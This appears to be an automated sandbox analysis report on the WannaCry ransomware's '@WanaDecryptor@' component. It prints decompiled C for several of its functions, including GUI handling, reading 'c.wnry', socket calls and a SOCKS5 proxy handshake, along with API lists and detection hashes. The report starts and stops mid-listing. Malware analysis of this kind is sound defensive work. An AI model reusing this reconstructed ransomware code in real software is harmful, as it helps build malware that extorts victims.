				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
					SendMessageA( *(__ecx + 0x80), 0x402, 0x28, 0);
					KillTimer( *(_t26 + 0x20), 0x3e9);
					L00412B66();
				}
				if(SendMessageA( *(_t26 + 0x80), 0x408, 0, 0) <  *((intOrPtr*)(_t26 + 0xb0))) {
					SendMessageA( *(_t26 + 0x80), 0x405, 0, 0); // executed
				}
				_t11 =  *(_t26 + 0xa0);
				if(_t11 == 0) {
					_t11 = SendMessageA( *(_t26 + 0x80), 0x408, 0, 0);
					if(_t11 == 0xf) {
						 *((intOrPtr*)(_t26 + 0xa8)) = 0xffffffff;
					}
				}
				goto L8;
			}





                                  0x00401220
                                  0x0040122b
                                  0x0040122d
                                  0x004012c2
                                  0x004012c4
                                  0x004012cb
                                  0x004012cb
                                  0x00401241
                                  0x00401253
                                  0x0040125e
                                  0x00401266
                                  0x00401266
                                  0x00401283
                                  0x00401295
                                  0x00401295
                                  0x00401297
                                  0x0040129f
                                  0x004012b1
                                  0x004012b6
                                  0x004012b8
                                  0x004012b8
                                  0x004012b6
                                  0x00000000

                                  APIs
                                  • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
                                  • KillTimer.USER32(?,000003E9), ref: 0040125E
                                  • #4853.MFC42 ref: 00401266
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
                                  • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
                                  • #2379.MFC42 ref: 004012C4
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#2379#4853KillTimer
                                  • String ID:
                                  • API String ID: 178170520-0
                                  • Opcode ID: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                  • Instruction ID: aacaf11b8525f3fa08346ebc997e4185e7a595c9bc7dc659aa73715d177cc548
                                  • Opcode Fuzzy Hash: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                  • Instruction Fuzzy Hash: FD114475340B00ABD6709A74CD41F6BB3D4BB94B10F20892DF395FB2D0DAB4B8068B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401A10 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: fclose$fopenfreadfwrite
                                  • String ID: c.wnry
                                  • API String ID: 2140422903-3240288721
                                  • Opcode ID: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                  • Instruction ID: f5186b7865cb40674a519f70d39de74d6a09c830656aa5640d665e45194f203f
                                  • Opcode Fuzzy Hash: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                  • Instruction Fuzzy Hash: 0DF0FC31746310EBD3209B19BD09BD77A56DFC0721F450436FC0ED63A4E2799946899E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406CF0 Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E00406CF0(void* __ecx, intOrPtr _a4) {
				int _v12;
				intOrPtr _v20;
				void* _v28;
				char _v36;
				intOrPtr _v40;
				void* _v48;
				struct HWND__* _t16;
				void* _t21;
				void* _t34;
				intOrPtr _t36;

				_push(0xffffffff);
				_push(E00413E78);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t36;
				_t34 = __ecx;
				_t16 = __ecx + 0x4c0;
				if(_t16 != 0) {
					_t16 =  *(_t16 + 0x20);
				}
				SendMessageA(_t16, 0x445, 0, 0x4000000);
				_push(0);
				_push(_a4);
				L00412F44(); // executed
				_v12 = 0;
				_v48 =  &_v36;
				_v40 = E00406DA0;
				SendMessageA( *(_t34 + 0x4e0), 0x449, 2,  &_v48); // executed
				L00412F3E();
				_t21 = E00406DC0(_t34);
				_v12 = 0xffffffff;
				L00412F38();
				 *[fs:0x0] = _v20;
				return _t21;
			}













                                  0x00406cf6
                                  0x00406cf8
                                  0x00406cfd
                                  0x00406cfe
                                  0x00406d09
                                  0x00406d0c
                                  0x00406d14
                                  0x00406d16
                                  0x00406d16
                                  0x00406d2c
                                  0x00406d32
                                  0x00406d34
                                  0x00406d39
                                  0x00406d55
                                  0x00406d5d
                                  0x00406d61
                                  0x00406d69
                                  0x00406d6f
                                  0x00406d76
                                  0x00406d7f
                                  0x00406d87
                                  0x00406d92
                                  0x00406d9c

                                  APIs
                                  • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
                                  • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,765920C0), ref: 00406D39
                                  • SendMessageA.USER32 ref: 00406D69
                                  • #1979.MFC42 ref: 00406D6F
                                  • #665.MFC42 ref: 00406D87
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#1979#353#665
                                  • String ID:
                                  • API String ID: 3794212480-0
                                  • Opcode ID: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                  • Instruction ID: 970bbd2b9484f858b006173e4a833a93101fbe0026f1fdcd253c6fb41473c1ec
                                  • Opcode Fuzzy Hash: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                  • Instruction Fuzzy Hash: EA1170B1244701AFD210EF15C942F9BB7E4BF94B14F504A1EF156A72C0C7B8A905CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407DB0 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00407DB0(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v100;
				char _v196;
				void* _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr _t26;
				void* _t28;

				 *[fs:0x0] = _t26;
				E00401000( &_v196, 0);
				_t24 = __imp__time;
				_v8 = 0;
				_t14 =  *_t24(0, _t23,  *[fs:0x0], E00413FA6, 0xffffffff);
				_t22 =  *0x4218a0; // 0x0
				_t28 = _t26 - 0xb8 + 4;
				if(_t14 - _t22 < 0x12c) {
					_v36 = 0;
				}
				_v32 = 0;
				L00412B72(); // executed
				_t16 = _v28;
				if(_t16 >= 0) {
					_t16 =  *_t24(0);
					_t28 = _t28 + 4;
					 *0x4218a0 = _t16;
				}
				 *0x4218a4 =  *0x4218a4 + 1;
				_v4 = 1;
				L00412C9E();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t16;
			}


















                                  0x00407dbe
                                  0x00407dd2
                                  0x00407dd7
                                  0x00407ddf
                                  0x00407dea
                                  0x00407dec
                                  0x00407df2
                                  0x00407dfc
                                  0x00407dfe
                                  0x00407dfe
                                  0x00407e0d
                                  0x00407e18
                                  0x00407e1d
                                  0x00407e26
                                  0x00407e2a
                                  0x00407e2c
                                  0x00407e2f
                                  0x00407e2f
                                  0x00407e34
                                  0x00407e3e
                                  0x00407e49
                                  0x00407e52
                                  0x00407e5d
                                  0x00407e6a
                                  0x00407e77

                                  APIs
                                    • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
                                    • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
                                  • time.MSVCRT ref: 00407DEA
                                  • #2514.MFC42 ref: 00407E18
                                  • time.MSVCRT ref: 00407E2A
                                  • #765.MFC42 ref: 00407E49
                                  • #641.MFC42 ref: 00407E5D
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: time$#2514#324#567#641#765
                                  • String ID:
                                  • API String ID: 3372871541-0
                                  • Opcode ID: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                  • Instruction ID: 27345a9b2c1eb8b6f7bb2a745056f56b64ece2280f016bc8de7da71c9126f67a
                                  • Opcode Fuzzy Hash: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                  • Instruction Fuzzy Hash: 4C11AD70A097809FE320EF24CA41BDA77E0BB94714F40462EE589872D0EB786445CB97
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DAD0 Relevance: 6.0, APIs: 4, Instructions: 45networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: closesocketsendsetsockoptshutdown
                                  • String ID:
                                  • API String ID: 4063721217-0
                                  • Opcode ID: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                  • Instruction ID: 511c5ca045328faec3d78f5435f76df0282562355462c5d2c83a81ecee0c9610
                                  • Opcode Fuzzy Hash: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                  • Instruction Fuzzy Hash: 9D014075200B40ABD3208B28C849B97B7A5AF89721F808B2CF6A9962D0D7B4A4088795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401970 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 55%
                                  			E00401970(intOrPtr _a4) {
				intOrPtr _v4;
				intOrPtr _v12;
				intOrPtr _t6;
				intOrPtr* _t10;

				_push(0xffffffff);
				_push(E004134D8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t10;
				_t6 = _a4;
				_v4 = 0;
				_push(_t6);
				_push(0x406);
				L00412CE6();
				L00412CE0(); // executed
				_v12 = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *_t10;
				return _t6;
			}







                                  0x00401976
                                  0x00401978
                                  0x0040197d
                                  0x0040197e
                                  0x00401985
                                  0x00401989
                                  0x00401991
                                  0x00401992
                                  0x00401997
                                  0x0040199e
                                  0x004019a7
                                  0x004019af
                                  0x004019b8
                                  0x004019c2

                                  APIs
                                  • #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                  • #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                  • #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3092#6199#800
                                  • String ID:
                                  • API String ID: 3924541682-0
                                  • Opcode ID: ecd91130295bb8af0247287c9129cb1c8204aaf667e5a628a3bd86e63acab10a
                                  • Instruction ID: e5ca7d8525ee00d79fb0b85b86dd9e556083ecc507c08eb16956c090e8f9caf4
                                  • Opcode Fuzzy Hash: ecd91130295bb8af0247287c9129cb1c8204aaf667e5a628a3bd86e63acab10a
                                  • Instruction Fuzzy Hash: 9DE04FB5248781ABD310DF14C942B6EBBA4FB94B20F208F1DF665937C0D77C9454CA66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004043E0 Relevance: 4.5, APIs: 3, Instructions: 15COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E004043E0(void* __ecx) {
				void* _t3;

				_push(1);
				_push(0x100);
				_push(0);
				L00412DDC();
				_t3 = __ecx + 0x40;
				_push(_t3); // executed
				L00412DD6(); // executed
				 *((char*)(__ecx + 0x5a)) = 0;
				L00412C14();
				return _t3;
			}




                                  0x004043e1
                                  0x004043e3
                                  0x004043ea
                                  0x004043ec
                                  0x004043f1
                                  0x004043f6
                                  0x004043f7
                                  0x004043fe
                                  0x00404402
                                  0x00404408

                                  APIs
                                  • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
                                  • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
                                  • #5277.MFC42 ref: 00404402
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3874#4284#5277
                                  • String ID:
                                  • API String ID: 1717392697-0
                                  • Opcode ID: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                  • Instruction ID: 168dd717f23fd29799672b21daad70d98dc1c3a6295a550393a3fd33bd33aa1c
                                  • Opcode Fuzzy Hash: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                  • Instruction Fuzzy Hash: B1D012303487645AE974B266BA0BBDB5A999B45B18F04044FF2459F2C1D9D858D083E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004133E6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E004133E6(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {

				_t1 =  &_a16; // 0x413236
				_push( *_t1);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				L0041343E(); // executed
				return __eax;
			}



                                  0x004133e6
                                  0x004133e6
                                  0x004133ea
                                  0x004133ee
                                  0x004133f2
                                  0x004133f6
                                  0x004133fb

                                  APIs
                                  • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1576
                                  • String ID: 62A
                                  • API String ID: 1976119259-856450375
                                  • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                  • Instruction ID: 1789da96975510f8b15a36ac976bc3503c656fbbd280c19756f03076dd05f2b6
                                  • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                  • Instruction Fuzzy Hash: AFB008360193D6ABCB12DE91890196ABAA2BB98305F484C1DB2A50146187668568AB16
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405860 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E00405860(void* __ecx, signed int _a4) {
				struct tagRECT _v16;
				signed int _t15;
				signed int _t23;
				void* _t24;

				_t24 = __ecx;
				_t23 = _a4;
				if( *(__ecx + 0x74) == 0) {
					 *(__ecx + 0x74) = _t23;
				}
				GetClientRect( *(_t24 + 0x20),  &_v16);
				_push(2);
				_push(_v16.bottom - _v16.top);
				_t15 = ( *((intOrPtr*)(_t24 + 0x68)) +  *((intOrPtr*)(_t24 + 0x60))) * _t23;
				_push(_t15);
				_push(0);
				_push(0);
				_push(0);
				L00412E60(); // executed
				return _t15;
			}







                                  0x00405864
                                  0x00405867
                                  0x00405870
                                  0x00405872
                                  0x00405872
                                  0x0040587e
                                  0x00405894
                                  0x00405898
                                  0x00405899
                                  0x0040589c
                                  0x0040589d
                                  0x0040589f
                                  0x004058a1
                                  0x004058a5
                                  0x004058af

                                  APIs
                                  • GetClientRect.USER32(?,?), ref: 0040587E
                                  • #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #6197ClientRect
                                  • String ID:
                                  • API String ID: 2663203813-0
                                  • Opcode ID: 08365d4a6b4c4d135f9bc492184b9046fd35a4d0fa1764fa72772bf707b20851
                                  • Instruction ID: 7afc014e2c7f757f2c38916e7ea6268c43ad9ab86f90261082180cf4c9fc0c78
                                  • Opcode Fuzzy Hash: 08365d4a6b4c4d135f9bc492184b9046fd35a4d0fa1764fa72772bf707b20851
                                  • Instruction Fuzzy Hash: 56F03075740601AFE324DE19CD56F67F7E9EBD4B00F00891EB985D7390D670F8048695
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004058C0 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E004058C0(void* __ecx, signed int _a4) {
				struct tagRECT _v16;
				void* _t15;
				signed int _t23;
				void* _t24;

				_t24 = __ecx;
				_t23 = _a4;
				if( *(__ecx + 0x70) == 0) {
					 *(__ecx + 0x70) = _t23;
				}
				GetClientRect( *(_t24 + 0x20),  &_v16);
				_push(2);
				_t15 = _v16.right - _v16.left;
				_push(( *((intOrPtr*)(_t24 + 0x6c)) +  *((intOrPtr*)(_t24 + 0x64))) * _t23);
				_push(_t15);
				_push(0);
				_push(0);
				_push(0);
				L00412E60(); // executed
				return _t15;
			}







                                  0x004058c4
                                  0x004058c7
                                  0x004058d0
                                  0x004058d2
                                  0x004058d2
                                  0x004058de
                                  0x004058f7
                                  0x004058f9
                                  0x004058fb
                                  0x004058fc
                                  0x004058fd
                                  0x004058ff
                                  0x00405901
                                  0x00405905
                                  0x0040590f

                                  APIs
                                  • GetClientRect.USER32(?,?), ref: 004058DE
                                  • #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #6197ClientRect
                                  • String ID:
                                  • API String ID: 2663203813-0
                                  • Opcode ID: 562337e5099e57004b5b98cc37fc2bf590d1ad0ce7ac89810234b565acd6d4d2
                                  • Instruction ID: 12e2120aa947bc0da8521fdfe4b738009e277cbc90461cf2c188bbd8c1c7c24c
                                  • Opcode Fuzzy Hash: 562337e5099e57004b5b98cc37fc2bf590d1ad0ce7ac89810234b565acd6d4d2
                                  • Instruction Fuzzy Hash: 60F01776700B01AFE214DA28C846F6BF7E9FBD4600F00891EB981D7290D6B0F8158A95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D8C0 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E0040D8C0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a24) {
				void* _v0;
				intOrPtr _v16;
				signed int _v20;
				char _v266;
				char _v267;
				char _v268;
				char _v272;
				char _v280;
				char _v282;
				signed int _v283;
				char _v284;
				void _v287;
				void _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				signed int _v296;
				char _v304;
				char _v312;
				char _v313;
				signed int _v315;
				char _v323;
				signed int _v324;
				signed int _t58;
				signed int _t65;
				signed int* _t66;
				void* _t71;
				void* _t74;
				void* _t86;
				signed int* _t87;
				void _t89;
				signed int _t111;
				signed int _t112;
				signed int _t117;
				void* _t127;
				void* _t132;
				void* _t141;
				intOrPtr _t143;

				_t58 =  *((intOrPtr*)(_v0 + 4))(_a4, _a8, _a24, _t132);
				if(_t58 != 0) {
					L24:
					return _t58 | 0xffffffff;
				} else {
					_t141 = _v0;
					_t89 = 0;
					_v272 = 0;
					if(_a8 != 0) {
						asm("repne scasb");
						_t89 = 1;
						_v272 = 1;
					}
					_v268 = 5;
					_v267 = 1;
					_v266 = 0;
					_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v268, 3);
					if(_t58 < 0) {
						L22:
						_t143 = _a4;
						if(_t143 > 0) {
							__imp__#3(_t143); // executed
						}
						goto L24;
					} else {
						_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v280, 2);
						if(_t58 < 0 || _v292 != 5 || _v291 == 0xff) {
							goto L22;
						} else {
							_v292 = 5;
							_v291 = 1;
							_v290 = 0;
							if(_v16 == 0) {
								_v289 = 1;
								_v288 =  *_t141;
								_t65 = _v20;
								_v283 = _t65;
								_v284 = _t65 >> 8;
								_t66 =  &_v282;
							} else {
								_v289 = 3;
								_t111 = _v296 & 0x000000ff;
								_v288 = _t89;
								_t112 = _t111 >> 2;
								memcpy( &_v287, _t141, _t112 << 2);
								_t86 = memcpy(_t141 + _t112 + _t112, _t141, _t111 & 0x00000003);
								_t117 = _v20;
								 *_t86 = _t117 >> 8;
								_t87 = _t86 + 1;
								 *_t87 = _t117;
								_t66 =  &(_t87[0]);
							}
							_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v292, _t66 -  &_v292);
							if(_t58 < 0) {
								goto L22;
							} else {
								_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v304, 4);
								if(_t58 < 0) {
									goto L22;
								} else {
									_t58 = _v315;
									if(_t58 != 0) {
										goto L22;
									} else {
										_t71 = _v313 - 1;
										if(_t71 == 0) {
											_t127 = _v0;
											_push(6);
											goto L19;
										} else {
											_t74 = _t71 - 2;
											if(_t74 == 0) {
												 *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v312, 1);
												_t127 = _v0;
												_push((_v324 & 0x000000ff) + 2);
												_push( &_v323);
												_push(_a4);
												goto L20;
											} else {
												if(_t74 != 1) {
													L21:
													return 0;
												} else {
													_t127 = _v0;
													_push(0x12);
													L19:
													_push( &_v312);
													_push(_a4);
													L20:
													_t58 =  *((intOrPtr*)(_t127 + 0x24))();
													if(_t58 < 0) {
														goto L22;
													} else {
														goto L21;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}










































                                  0x0040d8e9
                                  0x0040d8ee
                                  0x0040dab4
                                  0x0040dac1
                                  0x0040d8f4
                                  0x0040d8fb
                                  0x0040d902
                                  0x0040d906
                                  0x0040d90a
                                  0x0040d913
                                  0x0040d91a
                                  0x0040d91c
                                  0x0040d91c
                                  0x0040d930
                                  0x0040d935
                                  0x0040d93a
                                  0x0040d93f
                                  0x0040d944
                                  0x0040daa6
                                  0x0040daa6
                                  0x0040daab
                                  0x0040daae
                                  0x0040daae
                                  0x00000000
                                  0x0040d94a
                                  0x0040d95a
                                  0x0040d95f
                                  0x00000000
                                  0x0040d981
                                  0x0040d988
                                  0x0040d98f
                                  0x0040d994
                                  0x0040d999
                                  0x0040d9db
                                  0x0040d9e0
                                  0x0040d9e4
                                  0x0040d9ed
                                  0x0040d9f4
                                  0x0040d9f8
                                  0x0040d99b
                                  0x0040d9a8
                                  0x0040d9ad
                                  0x0040d9af
